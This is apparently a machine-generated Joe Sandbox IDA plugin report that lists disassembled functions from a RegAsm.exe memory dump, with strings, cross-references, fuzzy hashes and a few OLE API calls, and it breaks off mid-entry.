Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+($C/B$PP$w/B${,B
API String ID: 0-972049859
Opcode ID: f108147e9c89b25c338d66684fe976734d3acc4cc0822a4b8e8ab584e82e0512
Instruction ID: 717facf3f3cedcee0e29cd7bb72283fb7293ab32d829b1644d91dedf2cefdbd7
Opcode Fuzzy Hash: f108147e9c89b25c338d66684fe976734d3acc4cc0822a4b8e8ab584e82e0512
Instruction Fuzzy Hash: 81B10DB5A083519FE724CF24D84072BBBE1FBC4314F54892DF9889B391D7B99906CB86

Function 00422A5B Relevance: 6.5, Strings: 5, Instructions: 286COMMON

Download Yara Rule

Strings

w/B, xrefs: 00422F71
{,B, xrefs: 00422C75, 004230A7
PP, xrefs: 00422B17
C/B, xrefs: 00422F3D
%*+(, xrefs: 00422FA5

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+($C/B$PP$w/B${,B
API String ID: 0-972049859
Opcode ID: fe1946e3b1cf6f2bd98be23209126c813e27a9e979bb00ec56290447f67d950f
Instruction ID: 91e5af7dfd4d1b432d4c3a5b7e5db04e7f879f67a42b4b443800b3520032827c
Opcode Fuzzy Hash: fe1946e3b1cf6f2bd98be23209126c813e27a9e979bb00ec56290447f67d950f
Instruction Fuzzy Hash: 48A1FCB5A083519FE724CF24D94071BBBE1FBC4314F54892DF9899B3A1C7B98906CB86

Function 0043A020 Relevance: 5.7, Strings: 4, Instructions: 670COMMON

Download Yara Rule

Strings

uHu, xrefs: 0043A6F8
InA>, xrefs: 0043A5B0
l, xrefs: 0043A234
8, xrefs: 0043A400

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 8$InA>$l$uHu
API String ID: 0-4218388648
Opcode ID: f5d642fa0ffd220e39949634d70071f11485dae9cd0168edfd9d2f684acb2cae
Instruction ID: 6e336c0141b80e9053e6c9efad2ab916e00c8f184afe8afe6843256310ee380e
Opcode Fuzzy Hash: f5d642fa0ffd220e39949634d70071f11485dae9cd0168edfd9d2f684acb2cae
Instruction Fuzzy Hash: 1D22E0312483518FD325CF28C49035FBBE1EB85314F19892DE8E99B392DB79C846CB86

Function 00435CE0 Relevance: 5.6, Strings: 4, Instructions: 635COMMON

Download Yara Rule

Strings

InA>, xrefs: 00435D60
f, xrefs: 00435ED4
%*+(, xrefs: 00435D35
InA>, xrefs: 00435FD0

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: %*+($InA>$InA>$f
API String ID: 2994545307-1212648752
Opcode ID: ac35db6d584336e3fa4805ebf6ee7b0a43999d61e557685217b1f6ece38c82e2
Instruction ID: 50aff219358f5675aa6f0c4d8643ac969e62ddd3a6662522db26653b1bd1f920
Opcode Fuzzy Hash: ac35db6d584336e3fa4805ebf6ee7b0a43999d61e557685217b1f6ece38c82e2
Instruction Fuzzy Hash: ED32C0716083429FC714CF28C880B6FBBE1ABC9314F199A2EF59597392D735D805CB5A

Function 00420CDA Relevance: 5.4, Strings: 4, Instructions: 368COMMON

Download Yara Rule

Strings

bB, xrefs: 00420D51
%*+(, xrefs: 00420D85
%*+(, xrefs: 00421034
us, xrefs: 00420F30

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+($%*+($bB$us
API String ID: 0-129184300
Opcode ID: 0fe5194c6e907e687f7a54dcbff3389ceeccdf48b6d5c925e3d6e5713d1c76ed
Instruction ID: 590475790362aef5775324c60ec827194400d7162bef6e2668fc85afdb8847b9
Opcode Fuzzy Hash: 0fe5194c6e907e687f7a54dcbff3389ceeccdf48b6d5c925e3d6e5713d1c76ed
Instruction Fuzzy Hash: 1BA126756083409FD714CF24E98166FB7E4FB9A304F84893EF58683262DB39C946CB4A

Function 00404990 Relevance: 5.4, Strings: 4, Instructions: 355COMMON

Download Yara Rule

Strings

;Y@, xrefs: 00404F99
K@, xrefs: 00404BDB
N@, xrefs: 00404E67
"J@, xrefs: 00404A0F

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "J@$;Y@$N@$K@
API String ID: 0-1730295375
Opcode ID: 15aae6e7272fa08203538032254bb88678a499e30f6aa6b7ee89e3970efa9c87
Instruction ID: 23f8f128b1a99b4721173781899bae97d61687cc4df7deceabcde4945cdf5fe6
Opcode Fuzzy Hash: 15aae6e7272fa08203538032254bb88678a499e30f6aa6b7ee89e3970efa9c87
Instruction Fuzzy Hash: 7CD19A79608201CFD708CF28D89075A7BE2FF89316F19867DEA4987390D734D961CB85

Function 004210B0 Relevance: 5.3, Strings: 4, Instructions: 334COMMON

Download Yara Rule

Strings

bB, xrefs: 00420D51
%*+(, xrefs: 00420D85
%*+(, xrefs: 00421034
us, xrefs: 00420F30

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+($%*+($bB$us
API String ID: 0-129184300
Opcode ID: afd9d6476059291c9e1c5f28bdc3c9cb475815795ff43ac9887a5c8d80f85adc
Instruction ID: ddeffff2759a784cbc53f1a2ecf64e294b928d1d034bf9a5d3b5659c05783524
Opcode Fuzzy Hash: afd9d6476059291c9e1c5f28bdc3c9cb475815795ff43ac9887a5c8d80f85adc
Instruction Fuzzy Hash: 9F9104752183418FD708CF25E98166FB7E0FB9A304F84893EF58693266D738C906CB4A

Function 00431379 Relevance: 5.3, Strings: 4, Instructions: 284COMMON

Download Yara Rule

Strings

+, xrefs: 0043164F
(, xrefs: 00431653
*, xrefs: 0043164B
%, xrefs: 00431647

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %$($*$+
API String ID: 0-716900633
Opcode ID: e7f5f915ab38a388eb0fa8733627ef1a6cc0f564c7a3bec1d7882af5557d21d1
Instruction ID: a51c5c8ac9f6d7c7a3fd8f98cef6b729382aa65ecbccedb91254e535b2ff582a
Opcode Fuzzy Hash: e7f5f915ab38a388eb0fa8733627ef1a6cc0f564c7a3bec1d7882af5557d21d1
Instruction Fuzzy Hash: F6D19020508BC18ED7328A3C888435ABFE15B67324F1C8B9DD4EA8B7D3C7799546C766

Function 0042BED0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON

Download Yara Rule

Strings

0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0042C13A
3, xrefs: 0042C080
000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 0042C156
00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 0042C049

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$3
API String ID: 0-3148958432
Opcode ID: 76d337521e27f31ee896f162a7771935c3c337463d7ce85cdc9efd7ac2b9d2b6
Instruction ID: ce7b78704aec23f0f100b9c5f8250c37d1e0dc14a04cd823a941762529791c0f
Opcode Fuzzy Hash: 76d337521e27f31ee896f162a7771935c3c337463d7ce85cdc9efd7ac2b9d2b6
Instruction Fuzzy Hash: 20812A23749AB087D324853D6C9137A7A824F92330F7DC76ED9F6873E2D56E88068349

Function 00411260 Relevance: 4.6, Strings: 2, Instructions: 2103COMMON

Download Yara Rule

Strings

D, xrefs: 00412D7B
`, xrefs: 00411EB9

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: D$`
API String ID: 0-881360112
Opcode ID: 8f753543ea90e0474693d28ee7daf32d0c6d28c2cd7facae0d5b7a5c7f9fa07f
Instruction ID: a12b3458c38a0da20742625e017f099cdbf304783a8daeea1d5de12b955e1c34
Opcode Fuzzy Hash: 8f753543ea90e0474693d28ee7daf32d0c6d28c2cd7facae0d5b7a5c7f9fa07f
Instruction Fuzzy Hash: 3A134770508B808FC324DF38C5453A6BFE1AF56314F188A6ED4EA8B3D2D77AA446C756

Function 0041FA5D Relevance: 4.4, Strings: 3, Instructions: 639COMMON

Download Yara Rule

Strings

dUbS, xrefs: 0041FB60
`Qn_, xrefs: 0041FB67
ejkh, xrefs: 0041FAB0

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: `Qn_$dUbS$ejkh
API String ID: 0-3607805150
Opcode ID: 501958d84d1f89c3f33867aaf9a00a34fc4396fa0d9e80ff9ad53ff5c881b2ba
Instruction ID: c6147338adbbdd16a4a334053693c82bc98a5b2cc369ec1dee11409b88a7765c
Opcode Fuzzy Hash: 501958d84d1f89c3f33867aaf9a00a34fc4396fa0d9e80ff9ad53ff5c881b2ba
Instruction Fuzzy Hash: 63221876A00215CFCB14CF68D890AAEB7B2FF8A304F5980AAD445AB365DB359D43CB54

Function 00403F30 Relevance: 4.2, Strings: 3, Instructions: 420COMMON

Download Yara Rule

Strings

), xrefs: 00403FAC
), xrefs: 00403FB6
IEND, xrefs: 0040439C

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: ef92669c76779e70e88f96f76ab89203e784d509963e00b17a2859f219225626
Instruction ID: 502fb94a4a8c323d6ce947db1c2c875e9dafe8a0d68cfc94dacaa3be1783068d
Opcode Fuzzy Hash: ef92669c76779e70e88f96f76ab89203e784d509963e00b17a2859f219225626
Instruction Fuzzy Hash: A2F1F2B1A087019BD314DF29D85172BBBE0BB94304F04463EFA95A73C2D778E914CB8A

Function 00423BD8 Relevance: 4.0, Strings: 3, Instructions: 284COMMON

Download Yara Rule

Strings

?B, xrefs: 00423F03
T9X;, xrefs: 00423C9C
$%, xrefs: 00423CA4

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ?B$$%$T9X;
API String ID: 0-4026821037
Opcode ID: 6060bafb5a909b3851e0021a20ac30dbf6704356a207e2280a7b2f71a9cc2b71
Instruction ID: 7c6a79a51ead1f986ee90ea4a284e2ed8de9d0399f8d4ffa68c8e55ed59c13ce
Opcode Fuzzy Hash: 6060bafb5a909b3851e0021a20ac30dbf6704356a207e2280a7b2f71a9cc2b71
Instruction Fuzzy Hash: 238120B16083518BC714CF15E89136BB7F1EF85715F488A2CE4C68B351E778CA08CB4A

Function 004330D0 Relevance: 4.0, Strings: 3, Instructions: 247COMMON

Download Yara Rule

Strings

%*+(, xrefs: 0043316D
"2C, xrefs: 00433210
%*+(, xrefs: 00433317

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "2C$%*+($%*+(
API String ID: 0-2122309569
Opcode ID: 91297ddd3115418d97f9fe9c8326cf10708d82d549646a3d13fe90bd2db10ff1
Instruction ID: bc8855bd4006f7e4ba690c8aae72be736675e13ee23e4fd9b8df305fc48d6a10
Opcode Fuzzy Hash: 91297ddd3115418d97f9fe9c8326cf10708d82d549646a3d13fe90bd2db10ff1
Instruction Fuzzy Hash: 22513171208300EFE7149F29E851B2B73E1EBDA705F15983DE6C987282DB788901CB5A

Function 004161C0 Relevance: 3.9, Strings: 3, Instructions: 108COMMON

Download Yara Rule

Strings

ecA, xrefs: 0041635F
"! , xrefs: 004162BB
$ , xrefs: 004162C6

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $ $ecA$"!
API String ID: 0-3364350613
Opcode ID: 5146b2c82354623d605cc78332edba79ca46a49caa252a72dd7de7166de8602c
Instruction ID: a84adfe56098dfde3d8e2519e31f0818933c42745ba3a8db182c73bf23064917
Opcode Fuzzy Hash: 5146b2c82354623d605cc78332edba79ca46a49caa252a72dd7de7166de8602c
Instruction Fuzzy Hash: 66319F62B187808FD7348A6488913DFB7E1EBD6220F18493D95C897392D379444ADB47

Function 0042D536 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0042D5A5

Strings

0, xrefs: 0042D784

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString
String ID: 0
API String ID: 2525500382-4108050209
Opcode ID: 8d9fdf9cd23c1dd14dede5f80195176d81aba0a38e9b96bb77c966aa0ec2965c
Instruction ID: 9b617e75a7e927146c46d14a4011cccbd2e71a22201979af12b7a2fbf15f57d1
Opcode Fuzzy Hash: 8d9fdf9cd23c1dd14dede5f80195176d81aba0a38e9b96bb77c966aa0ec2965c
Instruction Fuzzy Hash: 2291F661508BC18ED326CB3C8888315BF915B6B228F6887DDD1E94F7E3C26AD507C766

Function 00419E20 Relevance: 3.3, Strings: 2, Instructions: 779COMMON

Download Yara Rule

Strings

4$&*, xrefs: 0041A479
! <&, xrefs: 0041A472

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: ! <&$4$&*
API String ID: 0-1491766249
Opcode ID: 66ca1c5eff0b8a5db1f344665fd271107b31af135dedfd2d29c9abebacfbf4a6
Instruction ID: 73f779976201de485cc298f6299d0ecf36237185142a5650bb55855f8bd5da74
Opcode Fuzzy Hash: 66ca1c5eff0b8a5db1f344665fd271107b31af135dedfd2d29c9abebacfbf4a6
Instruction Fuzzy Hash: 0C525670505B408FC735CF39C4906A7BBE1BF46314B188A6ED4E68BB92C738E846CB56

Function 00413970 Relevance: 3.0, Strings: 2, Instructions: 478COMMON

Download Yara Rule

Strings

:?A, xrefs: 00413F34
ejkh, xrefs: 00413D68

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: :?A$ejkh
API String ID: 0-1402537899
Opcode ID: 9c0bde013dd6f916255a110b857c79c4418f67362c6589ee1e7f930342b12ca2
Instruction ID: 90a2395316b79328b80d1edc6c30b531a8d8ea676b640ac94b0649158399f333
Opcode Fuzzy Hash: 9c0bde013dd6f916255a110b857c79c4418f67362c6589ee1e7f930342b12ca2
Instruction Fuzzy Hash: 29E133742493408BE7209F15D881BEB77E1FFC6315F04496DE4898B3A2E7788A41CB9A

Function 00433669 Relevance: 3.0, Strings: 2, Instructions: 462COMMON

Download Yara Rule

Strings

45, xrefs: 00433952
~9R7, xrefs: 004339F5

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 45$~9R7
API String ID: 0-836555404
Opcode ID: fa0b0923aa77ec7c0bce8498da90a2ac051695083cd5faf4f4d99f48298635a8
Instruction ID: ad4dc7a0aa512fc83ae058ab161b0f672087832ee79a4ef236db8d9d1df9ceb2
Opcode Fuzzy Hash: fa0b0923aa77ec7c0bce8498da90a2ac051695083cd5faf4f4d99f48298635a8
Instruction Fuzzy Hash: 1EE1057A518222CBC7149F38D852367B7E2FF8A351F0B8879D8818B6A4E77DC9508785

Function 00421174 Relevance: 2.9, Strings: 2, Instructions: 429COMMON

Download Yara Rule

Strings

yVh], xrefs: 0042135E
Y`Pb, xrefs: 00421581

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Y`Pb$yVh]
API String ID: 0-2084830440
Opcode ID: aee7aae619faeb57e78649503bdfdf56a5258b4be4529d21e7937fc3b90a49ea
Instruction ID: c7a8bce0301616f152d507d51aa2e55fc555080e95b96159c47b034a264a4de2
Opcode Fuzzy Hash: aee7aae619faeb57e78649503bdfdf56a5258b4be4529d21e7937fc3b90a49ea
Instruction Fuzzy Hash: 24C18C327483618FD714CA2894412EBBBE2DFB6350F48866FE485873A2D33DD946D35A

Function 0041D780 Relevance: 2.9, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

#"=, xrefs: 0041D9C2
ejkh, xrefs: 0041DBBF

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #"=$ejkh
API String ID: 0-1264473211
Opcode ID: a46293030c50fb474ed6e89541f734b865b6eeb3798e11c74ae46b5b1b41ae25
Instruction ID: 2532d6325f9ddb8c0f470edd802daaa4d380036ac41fe73ef2749a7e7db08eb1
Opcode Fuzzy Hash: a46293030c50fb474ed6e89541f734b865b6eeb3798e11c74ae46b5b1b41ae25
Instruction Fuzzy Hash: 22B128B2D083108BD710DB24C8527AB77E1EF81364F19892DE8C69B381E73D9D81C79A

Function 004138E0 Relevance: 2.9, Strings: 2, Instructions: 405COMMON

Download Yara Rule

Strings

B9A, xrefs: 0041378A, 00413937
ejkh, xrefs: 00413704

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: B9A$ejkh
API String ID: 0-1341962420
Opcode ID: 0c80afbbee87331d74cb0a7c00c466413c88a830813c499dfc4fb91b31bb7a3c
Instruction ID: 54f147c4b7cd38473d96433dd755f9f4254bbccbbeb24e47315024ccdde8b396
Opcode Fuzzy Hash: 0c80afbbee87331d74cb0a7c00c466413c88a830813c499dfc4fb91b31bb7a3c
Instruction Fuzzy Hash: 45A119B5900205CBCB10DF18CC926FB73B0FF55365F19416EE856AB3A1E778AA41C7A8

Function 00418C90 Relevance: 2.9, Strings: 2, Instructions: 368COMMON

Download Yara Rule

Strings

U'y!, xrefs: 00418FB7
X;e5, xrefs: 00418D23

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: U'y!$X;e5
API String ID: 0-3296774026
Opcode ID: b6e0189e1502e534b62590137653bd5c2d5c92e956156878abde7ba7129155cb
Instruction ID: 8e4d150e7c196ad40219415c3b81a7ab5a2e006976dfd0b3990fea51ddd4897c
Opcode Fuzzy Hash: b6e0189e1502e534b62590137653bd5c2d5c92e956156878abde7ba7129155cb
Instruction Fuzzy Hash: 31A1CEB15083018BC7249F24C8916BBB7F1FF91364F188A1EE8D59B390EB38D985C796

Function 00423710 Relevance: 2.7, Strings: 2, Instructions: 222COMMON

Download Yara Rule

Strings

Uqrs, xrefs: 0042373A
}K, xrefs: 00423811

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: Uqrs$}K
API String ID: 0-960693024
Opcode ID: 7406f14f5ce95ecc2b780525cbea17e76877f92d1144a6dbb84d135db62627ba
Instruction ID: beb5d8cd585f8ded2b0967c1a90115b3ce27acd002a283219496f90f71e2bb8a
Opcode Fuzzy Hash: 7406f14f5ce95ecc2b780525cbea17e76877f92d1144a6dbb84d135db62627ba
Instruction Fuzzy Hash: 6171E4715083658FD720CF69C85075FBBE1EBD5304F01892DE9E99B381D7B8894A8BC2

Function 004166F3 Relevance: 2.7, Strings: 2, Instructions: 182COMMON

Download Yara Rule

Strings

z, xrefs: 00416730, 00416767, 00416792
x, xrefs: 00416706

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: x$z
API String ID: 0-3420993086
Opcode ID: bb5595b4462b27ea4952cb37dbecaccdfdf7b9205afeba6d39a69317d5e507fc
Instruction ID: 5740a7024d2e97f291b9226dca0dcdd631566711d7bfd2cecd917f2ec36505b4
Opcode Fuzzy Hash: bb5595b4462b27ea4952cb37dbecaccdfdf7b9205afeba6d39a69317d5e507fc
Instruction Fuzzy Hash: F751F7716093508BC720DF24C8917ABBBE1EFC2358F09896DE4C99B392E77D8845C796

Function 00423A11 Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

GDB, xrefs: 00423BA0
HI, xrefs: 00423ADB

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: GDB$HI
API String ID: 0-924133197
Opcode ID: 312d50545c79561cee049e7d07627f7c68de33992084b31aa273948d4be1ac57
Instruction ID: 3e362e029a777e99a33f7eb5e6b5413ea0a62eb7512e086428ad90f4c42d2eb7
Opcode Fuzzy Hash: 312d50545c79561cee049e7d07627f7c68de33992084b31aa273948d4be1ac57
Instruction Fuzzy Hash: 0441C8B46083048AD710DF18D85276BB7F1FF82B15F44891DE4C18B3A2E7789A46DB8A

Function 00422BAB Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00422BD5
{(B, xrefs: 00423010, 0042308A

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+(${(B
API String ID: 0-2446882167
Opcode ID: 4fbd0a18541c03a9834103b375684cc96d19282d632b5201d9be0f667c652aa1
Instruction ID: 9ed6c502bb5bcacd76bb72d85002f139ec9cb5799aac8db208ab619654bd1abf
Opcode Fuzzy Hash: 4fbd0a18541c03a9834103b375684cc96d19282d632b5201d9be0f667c652aa1
Instruction Fuzzy Hash: 4221F6347083109BD7288F14A891B3FB772EB66714FA4151ED4C213266C77A9D429B99

Function 00424457 Relevance: 2.6, Strings: 2, Instructions: 60COMMON

Download Yara Rule

Strings

%*+(, xrefs: 00424485
GDB, xrefs: 004244D2, 004244F4

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: %*+($GDB
API String ID: 0-1977699624
Opcode ID: 2c94b1521b92dd58b57d338e5d478f19ea3e17571f102e190785b8f49c99f7c6
Instruction ID: ab2e02ce39b44dbe08f6447f4e6e81902e6d609775471c88f49bb3e938c5a44c
Opcode Fuzzy Hash: 2c94b1521b92dd58b57d338e5d478f19ea3e17571f102e190785b8f49c99f7c6
Instruction Fuzzy Hash: CD0108306083108BD7149F04E88023FF7B1EBC7724F998A2ED98513766C635AC41CB89

Function 0041D520 Relevance: 1.7, APIs: 1, Instructions: 241comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0043E5B0,00000000,00000001,0043E5A0), ref: 0041D549

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: f6442b77d05a10f0dc61e5b07bdcf6f6f71e3830d9c0246162d0d2b1237c8cc4
Instruction ID: 1914b1fedddb10cc3e03e362cd83de3ab0f5152d55b2ed43a119f0fc65bb9354
Opcode Fuzzy Hash: f6442b77d05a10f0dc61e5b07bdcf6f6f71e3830d9c0246162d0d2b1237c8cc4
Instruction Fuzzy Hash: 1D51BFF1A00214ABDB209B24CC86BA733B5EF85768F044559F989CB3D0F379E841C76A

Function 004259A0 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

", xrefs: 00425C88

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 41896febff51d4481664b0afe96819ff128c830c87e8350aae1a99de3f771de3
Instruction ID: 76cc21310578ec4794ec446908fb09bc8cb9ac5a68d45c7720bd89138e75de02
Opcode Fuzzy Hash: 41896febff51d4481664b0afe96819ff128c830c87e8350aae1a99de3f771de3
Instruction Fuzzy Hash: 99C126B2B04B209BD710CF25E44576BBBE9AF84314F98892FE4958B381E738DC45C796

Function 0042D07E Relevance: 1.6, APIs: 1, Instructions: 125COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0042D0BD

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: 820674285889d5b9cc5526b676f8678555ec464e862a06bd4dca39440985cb36
Instruction ID: dfca41d99a07de678be96dc9475a608ec3de281ec1156f1ac370d2784b1d5df3
Opcode Fuzzy Hash: 820674285889d5b9cc5526b676f8678555ec464e862a06bd4dca39440985cb36
Instruction Fuzzy Hash: D251BF22208B818FDB15CE7C88C8352BFD26BA6224F1DC2ADC5A58F3D7D678D406C365

Function 004233B0 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

r5B, xrefs: 0042355E

Memory Dump Source

Source File: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: r5B
API String ID: 0-2463598374
